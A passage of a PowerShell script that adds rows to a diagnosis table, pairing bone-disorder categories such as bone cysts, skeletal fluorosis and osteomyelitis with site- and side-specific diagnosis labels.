$DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), thigh","Fibrous dysplasia (monostotic), right thigh") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), thigh","Fibrous dysplasia (monostotic), left thigh") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), thigh","Fibrous dysplasia (monostotic), unspecified thigh") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), lower leg","Fibrous dysplasia (monostotic), right lower leg") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), lower leg","Fibrous dysplasia (monostotic), left lower leg") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), lower leg","Fibrous dysplasia (monostotic), unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), ankle and foot","Fibrous dysplasia (monostotic), right ankle and foot") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), ankle and foot","Fibrous dysplasia (monostotic), left ankle and foot") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), ankle and foot","Fibrous dysplasia (monostotic), unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), other site","Fibrous dysplasia (monostotic), other site") + $null = $DiagnosisList.Rows.Add("Fibrous dysplasia (monostotic), multiple sites","Fibrous dysplasia (monostotic), multiple sites") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis","Skeletal fluorosis, unspecified site") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, shoulder","Skeletal fluorosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, shoulder","Skeletal fluorosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, shoulder","Skeletal fluorosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, upper arm","Skeletal fluorosis, right upper arm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, upper arm","Skeletal fluorosis, left upper arm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, upper arm","Skeletal fluorosis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, forearm","Skeletal fluorosis, right forearm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, forearm","Skeletal fluorosis, left forearm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, forearm","Skeletal fluorosis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, hand","Skeletal fluorosis, right hand") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, hand","Skeletal fluorosis, left hand") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, hand","Skeletal fluorosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, thigh","Skeletal fluorosis, right thigh") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, thigh","Skeletal fluorosis, left thigh") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, thigh","Skeletal fluorosis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, lower leg","Skeletal fluorosis, right lower leg") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, lower leg","Skeletal fluorosis, left lower leg") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, lower leg","Skeletal fluorosis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, ankle and foot","Skeletal fluorosis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, ankle and foot","Skeletal fluorosis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, ankle and foot","Skeletal fluorosis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, other site","Skeletal fluorosis, other site") + $null = $DiagnosisList.Rows.Add("Skeletal fluorosis, multiple sites","Skeletal fluorosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Hyperostosis of skull","Hyperostosis of skull") + $null = $DiagnosisList.Rows.Add("Osteitis condensans","Osteitis condensans, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, shoulder","Osteitis condensans, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, shoulder","Osteitis condensans, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, shoulder","Osteitis condensans, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, upper arm","Osteitis condensans, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, upper arm","Osteitis condensans, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, upper arm","Osteitis condensans, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, forearm","Osteitis condensans, right forearm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, forearm","Osteitis condensans, left forearm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, forearm","Osteitis condensans, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, hand","Osteitis condensans, right hand") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, hand","Osteitis condensans, left hand") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, hand","Osteitis condensans, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, thigh","Osteitis condensans, right thigh") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, thigh","Osteitis condensans, left thigh") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, thigh","Osteitis condensans, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, lower leg","Osteitis condensans, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, lower leg","Osteitis condensans, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, lower leg","Osteitis condensans, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, ankle and foot","Osteitis condensans, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, ankle and foot","Osteitis condensans, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, ankle and foot","Osteitis condensans, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, other site","Osteitis condensans, other site") + $null = $DiagnosisList.Rows.Add("Osteitis condensans, multiple sites","Osteitis condensans, multiple sites") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst","Solitary bone cyst, unspecified site") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, shoulder","Solitary bone cyst, right shoulder") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, shoulder","Solitary bone cyst, left shoulder") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, shoulder","Solitary bone cyst, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, humerus","Solitary bone cyst, right humerus") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, humerus","Solitary bone cyst, left humerus") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, humerus","Solitary bone cyst, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ulna and radius","Solitary bone cyst, right ulna and radius") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ulna and radius","Solitary bone cyst, left ulna and radius") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ulna and radius","Solitary bone cyst, unspecified ulna and radius") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, hand","Solitary bone cyst, right hand") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, hand","Solitary bone cyst, left hand") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, hand","Solitary bone cyst, unspecified hand") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, pelvis","Solitary bone cyst, right pelvis") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, pelvis","Solitary bone cyst, left pelvis") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, pelvis","Solitary bone cyst, unspecified pelvis") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, tibia and fibula","Solitary bone cyst, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, tibia and fibula","Solitary bone cyst, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, tibia and fibula","Solitary bone cyst, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ankle and foot","Solitary bone cyst, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ankle and foot","Solitary bone cyst, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, ankle and foot","Solitary bone cyst, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Solitary bone cyst, other site","Solitary bone cyst, other site") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst","Aneurysmal bone cyst, unspecified site") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, shoulder","Aneurysmal bone cyst, right shoulder") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, shoulder","Aneurysmal bone cyst, left shoulder") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, shoulder","Aneurysmal bone cyst, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, upper arm","Aneurysmal bone cyst, right upper arm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, upper arm","Aneurysmal bone cyst, left upper arm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, upper arm","Aneurysmal bone cyst, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, forearm","Aneurysmal bone cyst, right forearm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, forearm","Aneurysmal bone cyst, left forearm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, forearm","Aneurysmal bone cyst, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, hand","Aneurysmal bone cyst, right hand") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, hand","Aneurysmal bone cyst, left hand") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, hand","Aneurysmal bone cyst, unspecified hand") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, thigh","Aneurysmal bone cyst, right thigh") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, thigh","Aneurysmal bone cyst, left thigh") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, thigh","Aneurysmal bone cyst, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, lower leg","Aneurysmal bone cyst, right lower leg") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, lower leg","Aneurysmal bone cyst, left lower leg") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, lower leg","Aneurysmal bone cyst, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, ankle and foot","Aneurysmal bone cyst, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, ankle and foot","Aneurysmal bone cyst, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, ankle and foot","Aneurysmal bone cyst, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, other site","Aneurysmal bone cyst, other site") + $null = $DiagnosisList.Rows.Add("Aneurysmal bone cyst, multiple sites","Aneurysmal bone cyst, multiple sites") + $null = $DiagnosisList.Rows.Add("Other cyst of bone","Other cyst of bone, unspecified site") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, shoulder","Other cyst of bone, right shoulder") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, shoulder","Other cyst of bone, left shoulder") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, shoulder","Other cyst of bone, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, upper arm","Other cyst of bone, right upper arm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, upper arm","Other cyst of bone, left upper arm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, upper arm","Other cyst of bone, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, forearm","Other cyst of bone, right forearm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, forearm","Other cyst of bone, left forearm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, forearm","Other cyst of bone, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, hand","Other cyst of bone, right hand") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, hand","Other cyst of bone, left hand") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, hand","Other cyst of bone, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, thigh","Other cyst of bone, right thigh") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, thigh","Other cyst of bone, left thigh") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, thigh","Other cyst of bone, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, lower leg","Other cyst of bone, right lower leg") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, lower leg","Other cyst of bone, left lower leg") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, lower leg","Other cyst of bone, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, ankle and foot","Other cyst of bone, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, ankle and foot","Other cyst of bone, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, ankle and foot","Other cyst of bone, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, other site","Other cyst of bone, other site") + $null = $DiagnosisList.Rows.Add("Other cyst of bone, multiple sites","Other cyst of bone, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure","Other specified disorders of bone density and structure, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, shoulder","Other specified disorders of bone density and structure, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, shoulder","Other specified disorders of bone density and structure, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, shoulder","Other specified disorders of bone density and structure, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, upper arm","Other specified disorders of bone density and structure, right upper arm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, upper arm","Other specified disorders of bone density and structure, left upper arm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, upper arm","Other specified disorders of bone density and structure, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, forearm","Other specified disorders of bone density and structure, right forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, forearm","Other specified disorders of bone density and structure, left forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, forearm","Other specified disorders of bone density and structure, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, hand","Other specified disorders of bone density and structure, right hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, hand","Other specified disorders of bone density and structure, left hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, hand","Other specified disorders of bone density and structure, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, thigh","Other specified disorders of bone density and structure, right thigh") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, thigh","Other specified disorders of bone density and structure, left thigh") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, thigh","Other specified disorders of bone density and structure, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, lower leg","Other specified disorders of bone density and structure, right lower leg") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, lower leg","Other specified disorders of bone density and structure, left lower leg") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, lower leg","Other specified disorders of bone density and structure, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, ankle and foot","Other specified disorders of bone density and structure, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, ankle and foot","Other specified disorders of bone density and structure, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, ankle and foot","Other specified disorders of bone density and structure, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, other site","Other specified disorders of bone density and structure, other site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bone density and structure, multiple sites","Other specified disorders of bone density and structure, multiple sites") + $null = $DiagnosisList.Rows.Add("Disorder of bone density and structure, unspecified","Disorder of bone density and structure, unspecified") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis","Acute hematogenous osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, shoulder","Acute hematogenous osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, shoulder","Acute hematogenous osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, shoulder","Acute hematogenous osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, humerus","Acute hematogenous osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, humerus","Acute hematogenous osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, humerus","Acute hematogenous osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, radius and ulna","Acute hematogenous osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, radius and ulna","Acute hematogenous osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, radius and ulna","Acute hematogenous osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, hand","Acute hematogenous osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, hand","Acute hematogenous osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, hand","Acute hematogenous osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, femur","Acute hematogenous osteomyelitis, right femur") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, femur","Acute hematogenous osteomyelitis, left femur") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, femur","Acute hematogenous osteomyelitis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, tibia and fibula","Acute hematogenous osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, tibia and fibula","Acute hematogenous osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, tibia and fibula","Acute hematogenous osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, ankle and foot","Acute hematogenous osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, ankle and foot","Acute hematogenous osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, ankle and foot","Acute hematogenous osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, other sites","Acute hematogenous osteomyelitis, other sites") + $null = $DiagnosisList.Rows.Add("Acute hematogenous osteomyelitis, multiple sites","Acute hematogenous osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis","Other acute osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, shoulder","Other acute osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, shoulder","Other acute osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, shoulder","Other acute osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, humerus","Other acute osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, humerus","Other acute osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, humerus","Other acute osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, radius and ulna","Other acute osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, radius and ulna","Other acute osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, radius and ulna","Other acute osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, hand","Other acute osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, hand","Other acute osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, hand","Other acute osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, femur","Other acute osteomyelitis, right femur") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, femur","Other acute osteomyelitis, left femur") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, femur","Other acute osteomyelitis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, tibia and fibula","Other acute osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, tibia and fibula","Other acute osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, tibia and fibula","Other acute osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, ankle and foot","Other acute osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, ankle and foot","Other acute osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, ankle and foot","Other acute osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, other site","Other acute osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Other acute osteomyelitis, multiple sites","Other acute osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis","Subacute osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, shoulder","Subacute osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, shoulder","Subacute osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, shoulder","Subacute osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, humerus","Subacute osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, humerus","Subacute osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, humerus","Subacute osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, radius and ulna","Subacute osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, radius and ulna","Subacute osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, radius and ulna","Subacute osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, hand","Subacute osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, hand","Subacute osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, hand","Subacute osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, femur","Subacute osteomyelitis, right femur") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, femur","Subacute osteomyelitis, left femur") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, femur","Subacute osteomyelitis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, tibia and fibula","Subacute osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, tibia and fibula","Subacute osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, tibia and fibula","Subacute osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, ankle and foot","Subacute osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, ankle and foot","Subacute osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, ankle and foot","Subacute osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, other site","Subacute osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Subacute osteomyelitis, multiple sites","Subacute osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis","Chronic multifocal osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, shoulder","Chronic multifocal osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, shoulder","Chronic multifocal osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, shoulder","Chronic multifocal osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, humerus","Chronic multifocal osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, humerus","Chronic multifocal osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, humerus","Chronic multifocal osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, radius and ulna","Chronic multifocal osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, radius and ulna","Chronic multifocal osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, radius and ulna","Chronic multifocal osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, hand","Chronic multifocal osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, hand","Chronic multifocal osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, hand","Chronic multifocal osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, femur","Chronic multifocal osteomyelitis, right femur") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, femur","Chronic multifocal osteomyelitis, left femur") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, femur","Chronic multifocal osteomyelitis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, tibia and fibula","Chronic multifocal osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, tibia and fibula","Chronic multifocal osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, tibia and fibula","Chronic multifocal osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, ankle and foot","Chronic multifocal osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, ankle and foot","Chronic multifocal osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, ankle and foot","Chronic multifocal osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, other site","Chronic multifocal osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Chronic multifocal osteomyelitis, multiple sites","Chronic multifocal osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus","Chronic osteomyelitis with draining sinus, unspecified site") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, shoulder","Chronic osteomyelitis with draining sinus, right shoulder") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, shoulder","Chronic osteomyelitis with draining sinus, left shoulder") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, shoulder","Chronic osteomyelitis with draining sinus, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, humerus","Chronic osteomyelitis with draining sinus, right humerus") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, humerus","Chronic osteomyelitis with draining sinus, left humerus") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, humerus","Chronic osteomyelitis with draining sinus, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, radius and ulna","Chronic osteomyelitis with draining sinus, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, radius and ulna","Chronic osteomyelitis with draining sinus, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, radius and ulna","Chronic osteomyelitis with draining sinus, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, hand","Chronic osteomyelitis with draining sinus, right hand") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining 